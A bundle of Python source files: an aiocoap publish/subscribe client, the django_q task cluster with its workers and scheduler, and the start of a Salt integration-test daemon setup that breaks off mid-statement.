self.root.after(100, self.process_network_results())
# Start the main loop
mainloop()
|
CoapAdapter.py
|
from aiocoap import *
import threading
import asyncio
class CoapAdapter:
def __init__(self, controller):
self.controller = controller
self.broker_address = None
self.protocol = None
self.topics = []
async def connect(self, address):
self.broker_address = address
async def subscribe(self, topic, qos=None):
self.topics.append(topic)
new_loop = asyncio.new_event_loop()
t = threading.Thread(target=self.start_loop, args=(new_loop, topic, ))
t.start()
async def publish(self, topic, identifier, payload, settings):
msg = Message(code=PUT, uri="coap://[{0}]:5683/ps/{1}".format(self.broker_address, topic),
payload=bytes(str(identifier + payload), encoding="utf-8"))
response = await self.protocol.request(msg).response
async def start_client(self):
self.protocol = await Context.create_client_context()
async def stop_client(self):
protocol = await Context.create_client_context()
for topic in self.topics:
request = Message(code=GET, uri='coap://[{0}]:5683/ps/{1}'.format(self.broker_address, topic), observe=1)
pr = protocol.request(request)
def start_loop(self, loop, topic):
asyncio.set_event_loop(loop)
loop.run_until_complete(self.observing(topic))
async def observing(self, topic):
protocol = await Context.create_client_context()
# Address for Test Broker: 2402:9400:1000:7::FFFF
msg = Message(code=POST, uri="coap://[{0}]:5683/ps".format(self.broker_address), payload=bytes("<{0}>;ct=0".format(topic), encoding="utf-8"))
response = await protocol.request(msg).response
request = Message(code=GET, uri='coap://[{0}]:5683/ps/{1}'.format(self.broker_address, topic), observe=0)
pr = protocol.request(request)
r = await pr.response
async for r in pr.observation:
self.controller.react(topic, r.payload.decode("utf-8"))
|
cluster.py
|
# Standard
import ast
import importlib
import signal
import socket
import traceback
import uuid
from multiprocessing import Event, Process, Value, current_process
from time import sleep
# External
import arrow
# Django
from django import db, core
from django.apps.registry import apps
try:
apps.check_apps_ready()
except core.exceptions.AppRegistryNotReady:
import django
django.setup()
from django.conf import settings
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
# Local
import django_q.tasks
from django_q.brokers import get_broker, Broker
from django_q.conf import (
Conf,
logger,
psutil,
get_ppid,
error_reporter,
croniter,
resource,
)
from django_q.humanhash import humanize
from django_q.models import Task, Success, Schedule
from django_q.queues import Queue
from django_q.signals import pre_execute
from django_q.signing import SignedPackage, BadSignature
from django_q.status import Stat, Status
class Cluster:
def __init__(self, broker: Broker = None):
self.broker = broker or get_broker()
self.sentinel = None
self.stop_event = None
self.start_event = None
self.pid = current_process().pid
self.cluster_id = uuid.uuid4()
self.host = socket.gethostname()
self.timeout = Conf.TIMEOUT
signal.signal(signal.SIGTERM, self.sig_handler)
signal.signal(signal.SIGINT, self.sig_handler)
def start(self) -> int:
# Start Sentinel
self.stop_event = Event()
self.start_event = Event()
self.sentinel = Process(
target=Sentinel,
args=(
self.stop_event,
self.start_event,
self.cluster_id,
self.broker,
self.timeout,
),
)
self.sentinel.start()
logger.info(_(f"Q Cluster {self.name} starting."))
while not self.start_event.is_set():
sleep(0.1)
return self.pid
def stop(self) -> bool:
if not self.sentinel.is_alive():
return False
logger.info(_(f"Q Cluster {self.name} stopping."))
self.stop_event.set()
self.sentinel.join()
logger.info(_(f"Q Cluster {self.name} has stopped."))
self.start_event = None
self.stop_event = None
return True
def sig_handler(self, signum, frame):
logger.debug(
_(
f'{current_process().name} got signal {Conf.SIGNAL_NAMES.get(signum, "UNKNOWN")}'
)
)
self.stop()
@property
def stat(self) -> Status:
if self.sentinel:
return Stat.get(pid=self.pid, cluster_id=self.cluster_id)
return Status(pid=self.pid, cluster_id=self.cluster_id)
@property
def name(self) -> str:
return humanize(self.cluster_id.hex)
@property
def is_starting(self) -> bool:
return self.stop_event and self.start_event and not self.start_event.is_set()
@property
def is_running(self) -> bool:
return self.stop_event and self.start_event and self.start_event.is_set()
@property
def is_stopping(self) -> bool:
return (
self.stop_event
and self.start_event
and self.start_event.is_set()
and self.stop_event.is_set()
)
@property
def has_stopped(self) -> bool:
return self.start_event is None and self.stop_event is None and self.sentinel
class Sentinel:
def __init__(
self,
stop_event,
start_event,
cluster_id,
broker=None,
timeout=Conf.TIMEOUT,
start=True,
):
# Make sure we catch signals for the pool
signal.signal(signal.SIGINT, signal.SIG_IGN)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
self.pid = current_process().pid
self.cluster_id = cluster_id
self.parent_pid = get_ppid()
self.name = current_process().name
self.broker = broker or get_broker()
self.reincarnations = 0
self.tob = timezone.now()
self.stop_event = stop_event
self.start_event = start_event
self.pool_size = Conf.WORKERS
self.pool = []
self.timeout = timeout
self.task_queue = (
Queue(maxsize=Conf.QUEUE_LIMIT) if Conf.QUEUE_LIMIT else Queue()
)
self.result_queue = Queue()
self.event_out = Event()
self.monitor = None
self.pusher = None
if start:
self.start()
def start(self):
self.broker.ping()
self.spawn_cluster()
self.guard()
def status(self) -> str:
if not self.start_event.is_set() and not self.stop_event.is_set():
return Conf.STARTING
elif self.start_event.is_set() and not self.stop_event.is_set():
if self.result_queue.empty() and self.task_queue.empty():
return Conf.IDLE
return Conf.WORKING
elif self.stop_event.is_set() and self.start_event.is_set():
if self.monitor.is_alive() or self.pusher.is_alive() or len(self.pool) > 0:
return Conf.STOPPING
return Conf.STOPPED
def spawn_process(self, target, *args) -> Process:
"""
:type target: function or class
"""
p = Process(target=target, args=args)
p.daemon = True
if target == worker:
p.daemon = Conf.DAEMONIZE_WORKERS
p.timer = args[2]
self.pool.append(p)
p.start()
return p
def spawn_pusher(self) -> Process:
return self.spawn_process(pusher, self.task_queue, self.event_out, self.broker)
def spawn_worker(self):
self.spawn_process(
worker, self.task_queue, self.result_queue, Value("f", -1), self.timeout
)
def spawn_monitor(self) -> Process:
return self.spawn_process(monitor, self.result_queue, self.broker)
def reincarnate(self, process):
"""
:param process: the process to reincarnate
:type process: Process or None
"""
close_old_django_connections()
if process == self.monitor:
self.monitor = self.spawn_monitor()
logger.error(_(f"reincarnated monitor {process.name} after sudden death"))
elif process == self.pusher:
self.pusher = self.spawn_pusher()
logger.error(_(f"reincarnated pusher {process.name} after sudden death"))
else:
self.pool.remove(process)
self.spawn_worker()
if process.timer.value == 0:
# only need to terminate on timeout, otherwise we risk destabilizing the queues
process.terminate()
logger.warning(_(f"reincarnated worker {process.name} after timeout"))
elif int(process.timer.value) == -2:
logger.info(_(f"recycled worker {process.name}"))
else:
logger.error(_(f"reincarnated worker {process.name} after death"))
self.reincarnations += 1
def spawn_cluster(self):
self.pool = []
Stat(self).save()
close_old_django_connections()
# spawn worker pool
for __ in range(self.pool_size):
self.spawn_worker()
# spawn auxiliary
self.monitor = self.spawn_monitor()
self.pusher = self.spawn_pusher()
# set worker cpu affinity if needed
if psutil and Conf.CPU_AFFINITY:
set_cpu_affinity(Conf.CPU_AFFINITY, [w.pid for w in self.pool])
def guard(self):
logger.info(
_(
f"{current_process().name} guarding cluster {humanize(self.cluster_id.hex)}"
)
)
self.start_event.set()
Stat(self).save()
logger.info(_(f"Q Cluster {humanize(self.cluster_id.hex)} running."))
counter = 0
cycle = Conf.GUARD_CYCLE # guard loop sleep in seconds
# Guard loop. Runs at least once
while not self.stop_event.is_set() or not counter:
# Check Workers
for p in self.pool:
with p.timer.get_lock():
# Are you alive?
if not p.is_alive() or p.timer.value == 0:
self.reincarnate(p)
continue
# Decrement timer if work is being done
if p.timer.value > 0:
p.timer.value -= cycle
# Check Monitor
if not self.monitor.is_alive():
self.reincarnate(self.monitor)
# Check Pusher
if not self.pusher.is_alive():
self.reincarnate(self.pusher)
# Call scheduler once a minute (or so)
counter += cycle
if counter >= 30 and Conf.SCHEDULER:
counter = 0
scheduler(broker=self.broker)
# Save current status
Stat(self).save()
sleep(cycle)
self.stop()
def stop(self):
Stat(self).save()
name = current_process().name
logger.info(_(f"{name} stopping cluster processes"))
# Stopping pusher
self.event_out.set()
# Wait for it to stop
while self.pusher.is_alive():
sleep(0.1)
Stat(self).save()
# Put poison pills in the queue
for __ in range(len(self.pool)):
self.task_queue.put("STOP")
self.task_queue.close()
# wait for the task queue to empty
self.task_queue.join_thread()
# Wait for all the workers to exit
while len(self.pool):
for p in self.pool:
if not p.is_alive():
self.pool.remove(p)
sleep(0.1)
Stat(self).save()
# Finally stop the monitor
self.result_queue.put("STOP")
self.result_queue.close()
# Wait for the result queue to empty
self.result_queue.join_thread()
logger.info(_(f"{name} waiting for the monitor."))
# Wait for everything to close or time out
count = 0
if not self.timeout:
self.timeout = 30
while self.status() == Conf.STOPPING and count < self.timeout * 10:
sleep(0.1)
Stat(self).save()
count += 1
# Final status
Stat(self).save()
def pusher(task_queue: Queue, event: Event, broker: Broker = None):
"""
Pulls tasks of the broker and puts them in the task queue
:type broker:
:type task_queue: multiprocessing.Queue
:type event: multiprocessing.Event
"""
if not broker:
broker = get_broker()
logger.info(_(f"{current_process().name} pushing tasks at {current_process().pid}"))
while True:
try:
task_set = broker.dequeue()
except Exception as e:
logger.error(e, traceback.format_exc())
# broker probably crashed. Let the sentinel handle it.
sleep(10)
break
if task_set:
for task in task_set:
ack_id = task[0]
# unpack the task
try:
task = SignedPackage.loads(task[1])
except (TypeError, BadSignature) as e:
logger.error(e, traceback.format_exc())
broker.fail(ack_id)
continue
task["ack_id"] = ack_id
task_queue.put(task)
logger.debug(_(f"queueing from {broker.list_key}"))
if event.is_set():
break
logger.info(_(f"{current_process().name} stopped pushing tasks"))
def monitor(result_queue: Queue, broker: Broker = None):
"""
Gets finished tasks from the result queue and saves them to Django
:type broker: brokers.Broker
:type result_queue: multiprocessing.Queue
"""
if not broker:
broker = get_broker()
name = current_process().name
logger.info(_(f"{name} monitoring at {current_process().pid}"))
for task in iter(result_queue.get, "STOP"):
# save the result
if task.get("cached", False):
save_cached(task, broker)
else:
save_task(task, broker)
# acknowledge result
ack_id = task.pop("ack_id", False)
if ack_id and (task["success"] or task.get("ack_failure", False)):
broker.acknowledge(ack_id)
# log the result
if task["success"]:
# log success
logger.info(_(f"Processed [{task['name']}]"))
else:
# log failure
logger.error(_(f"Failed [{task['name']}] - {task['result']}"))
logger.info(_(f"{name} stopped monitoring results"))
def worker(
task_queue: Queue, result_queue: Queue, timer: Value, timeout: int = Conf.TIMEOUT
):
"""
Takes a task from the task queue, tries to execute it and puts the result back in the result queue
:param timeout: number of seconds wait for a worker to finish.
:type task_queue: multiprocessing.Queue
:type result_queue: multiprocessing.Queue
:type timer: multiprocessing.Value
"""
name = current_process().name
logger.info(_(f"{name} ready for work at {current_process().pid}"))
task_count = 0
if timeout is None:
timeout = -1
# Start reading the task queue
for task in iter(task_queue.get, "STOP"):
result = None
timer.value = -1 # Idle
task_count += 1
# Get the function from the task
logger.info(_(f'{name} processing [{task["name"]}]'))
f = task["func"]
# if it's not an instance try to get it from the string
if not callable(task["func"]):
try:
module, func = f.rsplit(".", 1)
m = importlib.import_module(module)
f = getattr(m, func)
except (ValueError, ImportError, AttributeError) as e:
result = (e, False)
if error_reporter:
error_reporter.report()
# We're still going
if not result:
close_old_django_connections()
timer_value = task.pop("timeout", timeout)
# signal execution
pre_execute.send(sender="django_q", func=f, task=task)
# execute the payload
timer.value = timer_value # Busy
try:
res = f(*task["args"], **task["kwargs"])
result = (res, True)
except Exception as e:
result = (f"{e} : {traceback.format_exc()}", False)
if error_reporter:
error_reporter.report()
if task.get("sync", False):
raise
with timer.get_lock():
# Process result
task["result"] = result[0]
task["success"] = result[1]
task["stopped"] = timezone.now()
result_queue.put(task)
timer.value = -1 # Idle
# Recycle
if task_count == Conf.RECYCLE or rss_check():
timer.value = -2 # Recycled
break
logger.info(_(f"{name} stopped doing work"))
def save_task(task, broker: Broker):
"""
Saves the task package to Django or the cache
:param task: the task package
:type broker: brokers.Broker
"""
# SAVE LIMIT < 0 : Don't save success
if not task.get("save", Conf.SAVE_LIMIT >= 0) and task["success"]:
return
# enqueues next in a chain
if task.get("chain", None):
django_q.tasks.async_chain(
task["chain"],
group=task["group"],
cached=task["cached"],
sync=task["sync"],
broker=broker,
)
# SAVE LIMIT > 0: Prune database, SAVE_LIMIT 0: No pruning
close_old_django_connections()
try:
with db.transaction.atomic():
last = Success.objects.select_for_update().last()
if task["success"] and 0 < Conf.SAVE_LIMIT <= Success.objects.count():
last.delete()
# check if this task has previous results
if Task.objects.filter(id=task["id"], name=task["name"]).exists():
existing_task = Task.objects.get(id=task["id"], name=task["name"])
# only update the result if it hasn't succeeded yet
if not existing_task.success:
existing_task.stopped = task["stopped"]
existing_task.result = task["result"]
existing_task.success = task["success"]
existing_task.attempt_count = existing_task.attempt_count + 1
existing_task.save()
if Conf.MAX_ATTEMPTS > 0 and existing_task.attempt_count >= Conf.MAX_ATTEMPTS:
broker.acknowledge(task['ack_id'])
else:
Task.objects.create(
id=task["id"],
name=task["name"],
func=task["func"],
hook=task.get("hook"),
args=task["args"],
kwargs=task["kwargs"],
started=task["started"],
stopped=task["stopped"],
result=task["result"],
group=task.get("group"),
success=task["success"],
attempt_count=1
)
except Exception as e:
logger.error(e)
def save_cached(task, broker: Broker):
task_key = f'{broker.list_key}:{task["id"]}'
timeout = task["cached"]
if timeout is True:
timeout = None
try:
group = task.get("group", None)
iter_count = task.get("iter_count", 0)
# if it's a group append to the group list
if group:
group_key = f"{broker.list_key}:{group}:keys"
group_list = broker.cache.get(group_key) or []
# if it's an iter group, check if we are ready
if iter_count and len(group_list) == iter_count - 1:
group_args = f"{broker.list_key}:{group}:args"
# collate the results into a Task result
results = [
SignedPackage.loads(broker.cache.get(k))["result"]
for k in group_list
]
results.append(task["result"])
task["result"] = results
task["id"] = group
task["args"] = SignedPackage.loads(broker.cache.get(group_args))
task.pop("iter_count", None)
task.pop("group", None)
if task.get("iter_cached", None):
task["cached"] = task.pop("iter_cached", None)
save_cached(task, broker=broker)
else:
save_task(task, broker)
broker.cache.delete_many(group_list)
broker.cache.delete_many([group_key, group_args])
return
# save the group list
group_list.append(task_key)
broker.cache.set(group_key, group_list, timeout)
# async_task next in a chain
if task.get("chain", None):
django_q.tasks.async_chain(
task["chain"],
group=group,
cached=task["cached"],
sync=task["sync"],
broker=broker,
)
# save the task
broker.cache.set(task_key, SignedPackage.dumps(task), timeout)
except Exception as e:
logger.error(e)
def scheduler(broker: Broker = None):
"""
Creates a task from a schedule at the scheduled time and schedules next run
"""
if not broker:
broker = get_broker()
close_old_django_connections()
try:
with db.transaction.atomic(using=Schedule.objects.db):
for s in (
Schedule.objects.select_for_update()
.exclude(repeats=0)
.filter(next_run__lt=timezone.now())
.filter(db.models.Q(cluster__isnull=True) | db.models.Q(cluster=Conf.PREFIX))
):
args = ()
kwargs = {}
# get args, kwargs and hook
if s.kwargs:
try:
# eval should be safe here because dict()
kwargs = eval(f"dict({s.kwargs})")
except SyntaxError:
kwargs = {}
if s.args:
args = ast.literal_eval(s.args)
# single value won't eval to tuple, so:
if type(args) != tuple:
args = (args,)
q_options = kwargs.get("q_options", {})
if s.hook:
q_options["hook"] = s.hook
# set up the next run time
if s.schedule_type != s.ONCE:
next_run = arrow.get(s.next_run)
while True:
if s.schedule_type == s.MINUTES:
next_run = next_run.shift(minutes=+(s.minutes or 1))
elif s.schedule_type == s.HOURLY:
next_run = next_run.shift(hours=+1)
elif s.schedule_type == s.DAILY:
next_run = next_run.shift(days=+1)
elif s.schedule_type == s.WEEKLY:
next_run = next_run.shift(weeks=+1)
elif s.schedule_type == s.MONTHLY:
next_run = next_run.shift(months=+1)
elif s.schedule_type == s.QUARTERLY:
next_run = next_run.shift(months=+3)
elif s.schedule_type == s.YEARLY:
next_run = next_run.shift(years=+1)
elif s.schedule_type == s.CRON:
if not croniter:
raise ImportError(
_(
"Please install croniter to enable cron expressions"
)
)
next_run = arrow.get(
croniter(s.cron, timezone.localtime()).get_next()
)
if Conf.CATCH_UP or next_run > arrow.utcnow():
break
# arrow always returns a tz aware datetime, and we don't want
# this when we explicitly configured django with USE_TZ=False
s.next_run = (
next_run.datetime
if settings.USE_TZ
else next_run.datetime.replace(tzinfo=None)
)
s.repeats += -1
# send it to the cluster
scheduled_broker = broker
try:
scheduled_broker = get_broker(q_options["broker_name"])
except: # invalid broker_name or non existing broker with broker_name
pass
q_options["broker"] = scheduled_broker
q_options["group"] = q_options.get("group", s.name or s.id)
kwargs["q_options"] = q_options
s.task = django_q.tasks.async_task(s.func, *args, **kwargs)
# log it
if not s.task:
logger.error(
_(
f"{current_process().name} failed to create a task from schedule [{s.name or s.id}]"
)
)
else:
logger.info(
_(
f"{current_process().name} created a task from schedule [{s.name or s.id}]"
)
)
# default behavior is to delete a ONCE schedule
if s.schedule_type == s.ONCE:
if s.repeats < 0:
s.delete()
continue
# but not if it has a positive repeats
s.repeats = 0
# save the schedule
s.save()
except Exception as e:
logger.error(e)
def close_old_django_connections():
"""
Close django connections unless running with sync=True.
"""
if Conf.SYNC:
logger.warning(
"Preserving django database connections because sync=True. Beware "
"that tasks are now injected in the calling context/transactions "
"which may result in unexpected bahaviour."
)
else:
db.close_old_connections()
def set_cpu_affinity(n: int, process_ids: list, actual: bool = not Conf.TESTING):
"""
Sets the cpu affinity for the supplied processes.
Requires the optional psutil module.
:param int n: affinity
:param list process_ids: a list of pids
:param bool actual: Test workaround for Travis not supporting cpu affinity
"""
# check if we have the psutil module
if not psutil:
logger.warning("Skipping cpu affinity because psutil was not found.")
return
# check if the platform supports cpu_affinity
if actual and not hasattr(psutil.Process(process_ids[0]), "cpu_affinity"):
logger.warning(
"Faking cpu affinity because it is not supported on this platform"
)
actual = False
# get the available processors
cpu_list = list(range(psutil.cpu_count()))
# affinities of 0 or gte cpu_count, equals to no affinity
if not n or n >= len(cpu_list):
return
# spread the workers over the available processors.
index = 0
for pid in process_ids:
affinity = []
for k in range(n):
if index == len(cpu_list):
index = 0
affinity.append(cpu_list[index])
index += 1
if psutil.pid_exists(pid):
p = psutil.Process(pid)
if actual:
p.cpu_affinity(affinity)
logger.info(_(f"{pid} will use cpu {affinity}"))
def rss_check():
if Conf.MAX_RSS:
if resource:
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss >= Conf.MAX_RSS
elif psutil:
return psutil.Process().memory_info().rss >= Conf.MAX_RSS * 1024
return False
|
__init__.py
|
'''
Set up the Salt integration test suite
'''
# Import Python libs
import optparse
import multiprocessing
import os
import sys
import shutil
import tempfile
import time
import signal
import subprocess
from hashlib import md5
from subprocess import PIPE, Popen
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
# Import Salt libs
import salt
import salt.config
import salt.master
import salt.minion
import salt.runner
import salt.output
from salt.utils import fopen, get_colors
from salt.utils.verify import verify_env
from saltunittest import TestCase, RedirectStdStreams
try:
import console
width, height = console.getTerminalSize()
PNUM = width
except:
PNUM = 70
INTEGRATION_TEST_DIR = os.path.dirname(
os.path.normpath(os.path.abspath(__file__))
)
CODE_DIR = os.path.dirname(os.path.dirname(INTEGRATION_TEST_DIR))
SCRIPT_DIR = os.path.join(CODE_DIR, 'scripts')
PYEXEC = 'python{0}.{1}'.format(sys.version_info[0], sys.version_info[1])
# Gentoo Portage prefers ebuild tests are rooted in ${TMPDIR}
SYS_TMP_DIR = os.environ.get('TMPDIR', tempfile.gettempdir())
TMP = os.path.join(SYS_TMP_DIR, 'salt-tests-tmpdir')
FILES = os.path.join(INTEGRATION_TEST_DIR, 'files')
MOCKBIN = os.path.join(INTEGRATION_TEST_DIR, 'mockbin')
TMP_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-state-tree')
def print_header(header, sep='~', top=True, bottom=True, inline=False,
centered=False):
'''
Allows some pretty printing of headers on the console, either with a
"ruler" on bottom and/or top, inline, centered, etc.
'''
if top and not inline:
print(sep * PNUM)
if centered and not inline:
fmt = u'{0:^{width}}'
elif inline and not centered:
fmt = u'{0:{sep}<{width}}'
elif inline and centered:
fmt = u'{0:{sep}^{width}}'
else:
fmt = u'{0}'
print(fmt.format(header, sep=sep, width=PNUM))
if bottom and not inline:
print(sep * PNUM)
def run_tests(TestCase):
'''
Run integration tests for a chosen test case.
Function uses optparse to set up test environment
'''
from saltunittest import TestLoader, TextTestRunner
opts = parse_opts()
loader = TestLoader()
tests = loader.loadTestsFromTestCase(TestCase)
print('Setting up Salt daemons to execute tests')
with TestDaemon(clean=opts.clean):
runner = TextTestRunner(verbosity=opts.verbosity).run(tests)
sys.exit(runner.wasSuccessful())
def parse_opts():
'''
Parse command line options for running integration tests
'''
parser = optparse.OptionParser()
parser.add_option('-v',
'--verbose',
dest='verbosity',
default=1,
action='count',
help='Verbose test runner output')
parser.add_option('--clean',
dest='clean',
default=True,
action='store_true',
help=('Clean up test environment before and after '
'integration testing (default behaviour)'))
parser.add_option('--no-clean',
dest='clean',
action='store_false',
help=('Don\'t clean up test environment before and after '
'integration testing (speed up test process)'))
options, _ = parser.parse_args()
return options
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
def __init__(self, opts=None):
self.opts = opts
self.colors = get_colors(opts.no_colors is False)
def __enter__(self):
'''
Start a master and minion
'''
self.master_opts = salt.config.master_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
)
self.minion_opts = salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'minion')
)
#if sys.version_info < (2, 7):
# self.minion_opts['multiprocessing'] = False
self.sub_minion_opts = salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'sub_minion')
)
#if sys.version_info < (2, 7):
# self.sub_minion_opts['multiprocessing'] = False
self.smaster_opts = salt.config.master_config(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic_master'
)
)
self.syndic_opts = salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic'))
self.syndic_opts['_master_conf_file'] = os.path.join(
INTEGRATION_TEST_DIR,
'files/conf/master'
)
# Set up config options that require internal data
self.master_opts['pillar_roots'] = {
'base': [os.path.join(FILES, 'pillar', 'base')]
}
self.master_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
TMP_STATE_TREE
]
}
self.master_opts['ext_pillar'] = [
{'cmd_yaml': 'cat {0}'.format(
os.path.join(
FILES,
'ext.yaml'
)
)}
]
# clean up the old files
self._clean()
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
self.master_opts[optname] = optname_path
self.minion_opts[optname] = optname_path
self.sub_minion_opts[optname] = optname_path
verify_env([os.path.join(self.master_opts['pki_dir'], 'minions'),
os.path.join(self.master_opts['pki_dir'], 'minions_pre'),
os.path.join(self.master_opts['pki_dir'],
'minions_rejected'),
os.path.join(self.master_opts['cachedir'], 'jobs'),
os.path.join(self.smaster_opts['pki_dir'], 'minions'),
os.path.join(self.smaster_opts['pki_dir'], 'minions_pre'),
os.path.join(self.smaster_opts['pki_dir'],
'minions_rejected'),
os.path.join(self.smaster_opts['cachedir'], 'jobs'),
os.path.dirname(self.master_opts['log_file']),
self.minion_opts['extension_modules'],
self.sub_minion_opts['extension_modules'],
self.sub_minion_opts['pki_dir'],
self.master_opts['sock_dir'],
self.smaster_opts['sock_dir'],
self.sub_minion_opts['sock_dir'],
self.minion_opts['sock_dir'],
TMP_STATE_TREE,
TMP
],
pwd.getpwuid(os.getuid()).pw_name)
# Set up PATH to mockbin
self._enter_mockbin()
master = salt.master.Master(self.master_opts)
self.master_process = multiprocessing.Process(target=master.start)
self.master_process.start()
minion = salt.minion.Minion(self.minion_opts)
self.minion_process = multiprocessing.Process(target=minion.tune_in)
self.minion_process.start()
sub_minion = salt.minion.Minion(self.sub_minion_opts)
self.sub_minion_process = multiprocessing.Process(
target=sub_minion.tune_in
)
self.sub_minion_process.start()
smaster = salt.master.Master(self.smaster_opts)
self.smaster_process = multiprocessing.Process(target=smaster.start)
self.smaster_process.start()
syndic = salt.minion.Syndic(self.syndic_opts)
self.syndic_process = multiprocessing.Process(target=syndic.tune_in)
self.syndic_process.start()
if os.environ.get('DUMP_SALT_CONFIG', None) is not None:
from copy import deepcopy
try:
import yaml
os.makedirs('/tmp/salttest/conf')
except OSError:
pass
master_opts = deepcopy(self.master_opts)
minion_opts = deepcopy(self.minion_opts)
master_opts.pop('conf_file', None)
master_opts['user'] = pwd.getpwuid(os.getuid()).pw_name
minion_opts['user'] = pwd.getpwuid(os.getuid()).pw_name
minion_opts.pop('conf_file', None)
minion_opts.pop('grains', None)
minion_opts.pop('pillar', None)
open('/tmp/salttest/conf/master', 'w').write(
yaml.dump(master_opts)
)
open('/tmp/salttest/conf/minion', 'w').write(
yaml.dump(minion_opts)
)
self.minion_targets = set(['minion', 'sub_minion'])
self.pre_setup_minions()
self.setup_minions()
if self.opts.sysinfo:
from salt import version
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(version.versions_report()))
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
)
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
@property
def client(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because it's creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
'''
return salt.client.LocalClient(
mopts=self.master_opts
)
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
self.sub_minion_process.terminate()
self.minion_process.terminate()
self.master_process.terminate()
self.syndic_process.terminate()
self.smaster_process.terminate()
self._exit_mockbin()
self._clean()
def pre_setup_minions(self):
'''
Subclass this method for additional minion setups.
'''
def setup_minions(self):
# Wait for minions to connect back
wait_minion_connections = multiprocessing.Process(
target=self.wait_for_minion_connections,
args=(self.minion_targets, self.MINIONS_CONNECT_TIMEOUT)
)
wait_minion_connections.start()
wait_minion_connections.join()
wait_minion_connections.terminate()
if wait_minion_connections.exitcode > 0:
print(
'\n {RED_BOLD}*{ENDC} ERROR: Minions failed to connect'.format(
**self.colors
)
)
return False
del(wait_minion_connections)
sync_needed = self.opts.clean
if self.opts.clean is False:
def sumfile(fpath):
# Since we will be do'in this for small files, it should be ok
fobj = fopen(fpath)
m = md5()
while True:
d = fobj.read(8096)
if not d:
break
m.update(d)
return m.hexdigest()
# Since we're not cleaning up, let's see if modules are already up
# to date so we don't need to re-sync them
modules_dir = os.path.join(FILES, 'file', 'base', '_modules')
for fname in os.listdir(modules_dir):
if not fname.endswith('.py'):
continue
dfile = os.path.join(
'/tmp/salttest/cachedir/extmods/modules/', fname
)
if not os.path.exists(dfile):
sync_needed = True
break
sfile = os.path.join(modules_dir, fname)
if sumfile(sfile) != sumfile(dfile):
sync_needed = True
break
if sync_needed:
# Wait for minions to "sync_all"
sync_minions = multiprocessing.Process(
target=self.sync_minion_modules,
args=(self.minion_targets, self.MINIONS_SYNC_TIMEOUT)
)
sync_minions.start()
sync_minions.join()
if sync_minions.exitcode > 0:
return False
sync_minions.terminate()
del(sync_minions)
return True
def post_setup_minions(self):
'''
Subclass this method to execute code after the minions have been setup
'''
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
def _clean(self):
'''
Clean out the tmp files
'''
if not self.opts.clean:
return
if os.path.isdir(self.sub_minion_opts['root_dir']):
shutil.rmtree(self.sub_minion_opts['root_dir'])
if os.path.isdir(self.master_opts['root_dir']):
shutil.rmtree(self.master_opts['root_dir'])
if os.path.isdir(self.smaster_opts['root_dir']):
shutil.rmtree(self.smaster_opts['root_dir'])
if os.path.isdir(TMP):
shutil.rmtree(TMP)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write('\r' + ' ' * PNUM + '\r')
if not running and job_finished is False:
# Let's not have false positives and wait one more seconds
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else:
sys.stdout.write(
'\n {RED_BOLD}*{ENDC} ERROR: Failed to get information '
'back\n'.format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(
list(targets), 'saltutil.running', expr_form='list'
)
return [
k for (k, v) in running.iteritems() if v and v[0]['jid'] == jid
]
def wait_for_minion_connections(self, targets, timeout):
sys.stdout.write(
' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
'connect back\n'.format(
(timeout > 60 and
timedelta(seconds=timeout) or
'{0} secs'.format(timeout)),
', '.join(targets),
**self.colors
)
)
sys.stdout.flush()
expected_connections = set(targets)
now = datetime.now()
expire = now + timedelta(seconds=timeout)
while now <= expire:
sys.stdout.write('\r' + ' ' * PNUM + '\r')
sys.stdout.write(
' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(expected_connections),
**self.colors
)
)
sys.stdout.flush()
responses = self.client.cmd(
list(expected_connections), 'test.ping', expr_form='list',
)
for target in responses:
if target not in expected_connections:
# Someone(minion) else "listening"?
print target
continue
expected_connections.remove(target)
sys.stdout.write('\r' + ' ' * PNUM + '\r')
sys.stdout.write(
